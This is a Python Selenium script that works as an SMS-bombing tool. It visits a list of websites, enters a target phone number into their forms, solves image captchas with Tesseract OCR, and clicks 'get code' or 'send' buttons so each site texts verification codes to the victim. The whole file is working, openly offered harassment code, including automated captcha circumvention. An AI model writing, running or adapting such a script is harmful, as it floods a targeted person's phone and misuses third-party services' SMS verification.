# python 3.5.0 # 通过Chrom浏览器访问发起请求 # 需要对应版本的Chrom和chromdriver # 作者:linyouyi from selenium import webdriver # 引入Keys类包 发起键盘操作 from selenium.webdriver.common.keys import Keys import threading import time import random import requests import eventlet import _thread from io import BytesIO from PIL import Image from PIL import ImageEnhance import pytesseract import re pytesseract.pytesseract.tesseract_cmd = 'D:\\Program Files\\Tesseract-OCR\\tesseract.exe' tessdata_dir_config = '--tessdata-dir "D:\\Program Files\\Tesseract-OCR\\tessdata"' def chrome(): print("启动第一个线程==============================") chromeOptions = webdriver.ChromeOptions() #chromeOptions.add_argument('user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1"') chrome_driver="C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe" #chromeOptions.add_argument("--headless") chromeOptions.add_argument("--disable-gpu") #下面两行是禁止加载图片,提高速度 #prefs = {"profile.managed_default_content_settings.images":2} #chromeOptions.add_experimental_option("prefs",prefs) driver = webdriver.Chrome(chrome_options=chromeOptions,executable_path=chrome_driver) return driver def read_file(filedir): '''读取链接文件''' file = open(filedir,'r') return file def send_massage(filedir): '''一次返回一个链接''' file = read_file(filedir) for line in file: # 生成器,一次返回一项 yield line file.close() def binaryzation(code_image,value): '''二值化处理''' #转换成灰度 im = code_image.convert('L') #对比度增强 im = ImageEnhance.Contrast(im) im = im.enhance(1) #锐度增强 #im=ImageEnhance.Sharpness(im) #im=im.enhance(3.0) #色度增强 #im=ImageEnhance.Color(im) #im=im.enhance(3.0) #亮度增强 #im=ImageEnhance.Brightness(im) #im=im.enhance(2.0) table = [] for y in range(256): if y < value: table.append(0) else: table.append(1) im = im.point(table,'1') return im def discern(code_img): '''识别验证码''' try: im = binaryzation(code_img,127) code = pytesseract.image_to_string(im) # 保留数字和字母 code = re.sub("\W", "", code) if code == '': return "6666" else: return code except: return "识别验证码失败!!!" def call_link(filedir): '''在所有input填入手机号码,获取验证码图片,识别完输入验证码''' driver = chrome() link = send_massage(filedir) for link in link: print(link) try: # 超时则跳过 eventlet.monkey_patch() with eventlet.Timeout(100,False): # 访问链接 driver.get(link) # 最多等待10秒 driver.implicitly_wait(10) button = driver.find_elements_by_xpath('//button') span = driver.find_elements_by_xpath('//span') inp = driver.find_elements_by_xpath('//div//input') '''# 所有input都填上手机号码 for aa in inp: try: aa.send_keys('00000000000') time.sleep(random.randint(1,2)) except: print("########")''' time.sleep(5) # 获取所有图片标签 images = driver.find_elements_by_xpath('//img') for img in images: img_link = img.get_attribute("src") if ("captcha" in img_link): print(img_link) # 获取验证码在画布中的位置x,y轴坐标 img_location = img.location # 获取验证码大小 img_size = img.size # 截取的是整个屏幕 code_img = driver.get_screenshot_as_png() # 截图保存 #driver.get_screenshot_as_file('D:\\pythontest\\duanxinhongzha\\aa.png') code_img = Image.open(BytesIO(code_img)) # 使用Image的crop函数,从截图中再次截取我们需要的验证码所在区域 code_img = code_img.crop((img_location['x'],img_location['y'],int(img_location['x'] + img_size['width']),int(img_location['y'] + img_size['height']))) # 图片放大两倍 code_img = code_img.resize((img_size['width'] * 2,img_size['height'] * 2)) #code_img.save('D:\\pythontest\\duanxinhongzha\\aa.png') print("验证码所在区域大小为:", code_img.size) # 把识别的验证码填入,如果识别不出来择忽略错误 code_num = discern(code_img) print(code_num) # 根据条件输入验证码,不符合条件的input都填上手机号码 for inp_num in inp: try: if ("captcha" in inp_num.get_attribute('id').lower() ): inp_num.send_keys(code_num) elif ("ode" in inp_num.get_attribute('id').lower()): inp_num.send_keys(code_num) elif ("captcha" in inp_num.get_attribute('name').lower()): inp_num.send_keys(code_num) else: inp_num.send_keys('00000000000') time.sleep(random.randint(1,2)) except: print("########") # 如果按钮是a标签形式,则获取然后点击 try: driver.find_element_by_partial_link_text("获取").click() except: print("a标签失败") # 如果按钮是button标签形式,则获取然后点击 try: for button in button: if ("获取" in button.text or "发送" in button.text or "码" in button.text): button.click() except: print("button失败!!!") # 如果按钮是span标签形式,则获取然后点击 try: for span in span: if ("获取" in span.text or "发送" in span.text or "码" in span.text): span.click() except: print("span失败!!!") # 如果按钮是input标签形式,则获取然后点击 try: for inp in inp: if ("获取" in inp.get_attribute("value") or "发送" in inp.get_attribute("value") or "码" in inp.get_attribute("value")): inp.click() except: print("input失败!!!") #driver.find_element_by_partial_link_text(str(u"获取").encode('utf-8')).send_keys(Keys.ENTER) #driver.find_element_by_partial_link_text('获取').find_element().click() print("短信发送完毕!!!!") time.sleep(5) except: print("获取文本失败!!!") driver.quit() if __name__ == '__main__': #t1 = threading.Thread(target=query_register) #t2 = threading.Thread(target=button) t3 = threading.Thread(target=call_link('D:\pythontest\lianjie1.txt')) #t1.start() #t2.start() t3.start()